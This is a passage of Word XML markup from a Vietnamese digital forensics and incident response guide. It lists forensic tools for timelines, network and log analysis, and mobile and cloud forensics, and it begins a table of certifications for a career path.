              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5FFDE5D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Quét RAM hoặc đĩa để tìm email, URL, số thẻ và mẫu hash.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="76"/>
    </w:tbl>
    <w:p w14:paraId="67EEC3D6">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="77" w:name="timeline-và-artefact"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>15.4. Timeline và artefact</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="13"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="10" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2751"/>
        <w:gridCol w:w="7295"/>
      </w:tblGrid>
      <w:tr w14:paraId="660952D6">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4901ECC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Công cụ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3892A83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Công dụng</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="36435E95">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2B26866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Plaso/log2timeline</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="63FEA23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Tạo Super Timeline từ hơn 50 loại artefact.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6A106838">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0D03832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Timesketch</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="45FB92E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Phân tích timeline cộng tác trên web, dùng đầu ra Plaso.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="14A5BC1E">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5EAA4E8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RegRipper</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2406640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Parser Registry với nhiều plugin chuyên dụng.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7462163B">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69F4391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AppCompatCacheParser</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2773747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Trích xuất Shimcache, hỗ trợ lịch sử thực thi chương trình.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="397F2118">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028D9BC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AmcacheParser</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="06438E8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 xml:space="preserve">Phân tích </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="39"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Amcache.hve</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2DD10F12">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2CE4AFC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WxTCmd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0317551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Phân tích Windows Timeline/ActivitiesCache, hỗ trợ tương quan sự kiện.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2A36125A">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2E58C23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KAPE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0355A14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Thu thập có mục tiêu và triage nhanh artefact từ hệ thống live/dead.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="77"/>
    </w:tbl>
    <w:p w14:paraId="1F81894E">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="78" w:name="mạng-và-log"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>15.5. Mạng và log</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="13"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="10" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2288"/>
        <w:gridCol w:w="7758"/>
      </w:tblGrid>
      <w:tr w14:paraId="77C2AAF8">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3359F1C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Công cụ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2EF7900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Công dụng</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="553CC3D6">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6D7AE5B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Wireshark/TShark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3477F4E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Phân tích PCAP, dissect giao thức, follow stream và trích xuất tệp.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="544D965B">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35758F2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Zeek</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="715CC17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 xml:space="preserve">Chuyển PCAP thành log có cấu trúc như </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="39"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>conn</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="39"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>dns</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="39"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>http</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="39"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>ssl</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="39"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>files</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2B5BEDAE">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65AE449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NetworkMiner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="561D842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Tái dựng phiên, trích xuất tệp và credential từ PCAP.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7EF721C6">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285F9CB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Suricata</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="28F2CEC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IDS/IPS và NSM; xuất EVE JSON cho SIEM.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="124BB750">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2409EA9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Chainsaw</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="22F9B88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Triage EVTX nhanh, hỗ trợ Sigma và CLI.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3B52D5A1">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56560CE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Hayabusa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1583D14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Phân tích Windows Event Log, Sigma và tạo timeline.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="213F3D69">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7F6EEBB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RITA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="287FCFD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Phân tích log Zeek để phát hiện beacon, DGA và kết nối kéo dài.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="78"/>
    </w:tbl>
    <w:p w14:paraId="07174BFB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="79" w:name="di-động-và-đám-mây"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>15.6. Di động và đám mây</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="13"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="10" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3468"/>
        <w:gridCol w:w="6578"/>
      </w:tblGrid>
      <w:tr w14:paraId="6DE0345B">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0C25350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Công cụ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7847E72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Công dụng</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4B15EF24">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5302DE0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Cellebrite UFED/Physical Analyzer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="16A978E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Thu thập và phân tích di động thương mại.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3C2C3AE3">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4CB9FAB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Oxygen Forensic Detective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0DC2480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Phân tích di động, cloud, IoT và dữ liệu mạng xã hội.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="36950BD9">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084129A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iLEAPP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3092AB2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Parser miễn phí cho log, event và plist iOS.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="003E5D03">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20FD01D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ALEAPP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7E526F0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Parser miễn phí cho artefact Android.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="54E107E0">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2CCF84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Hindsight</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2AFF032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Parser lịch sử trình duyệt Chrome, Firefox, Safari và Edge dựa trên SQLite.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7085FDB9">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35A254B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HAWK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3D0285B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Bộ công cụ pháp chứng Microsoft 365 và Unified Audit Log.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="47D90B3C">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71D4B7F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CloudQuery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6211E67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Thu thập dữ liệu API hạ tầng AWS, Azure và GCP.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="73"/>
      <w:bookmarkEnd w:id="79"/>
    </w:tbl>
    <w:p w14:paraId="5111C00C">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext/>
        <w:pageBreakBefore/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="80" w:name="X09d965e0ce8966c62abd3324a6b3c7400c195b4"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>16. Nghề nghiệp, chứng chỉ và lộ trình học tập</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC73340">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i/>
          <w:iCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Từ người mới bắt đầu đến chuyên gia DFIR.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37402ACC">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="81" w:name="lộ-trình-chứng-chỉ"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>16.1. Lộ trình chứng chỉ</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="13"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="10" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2216"/>
        <w:gridCol w:w="7830"/>
      </w:tblGrid>
      <w:tr w14:paraId="067F5353">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28BAA5F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Chứng chỉ/khóa học</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5803DB6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Trọng tâm</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1B9A83C4">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0F1F837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CompTIA Security+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5FB7B44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Nền tảng an toàn thông tin và khái niệm pháp chứng; điều kiện phổ biến cho vị trí đầu vào.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="00AD37D7">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68CEEA1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BTL1/BTL2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="169C434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Blue Team Labs, thực hành SOC và DFIR với lab trực tiếp.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3658F31B">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7340150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CEH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2D77351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Khái niệm ethical hacking và pháp chứng cơ bản; được nhiều bộ phận HR nhận biết.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4CD571CC">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00E24CE1">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eJPT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2E6124F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Chứng chỉ thực hành đầu vào có một số nội dung điều tra.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2FC4AFF3">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19D0B10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GCFE</w:t>
            </w:r>
          </w:p>
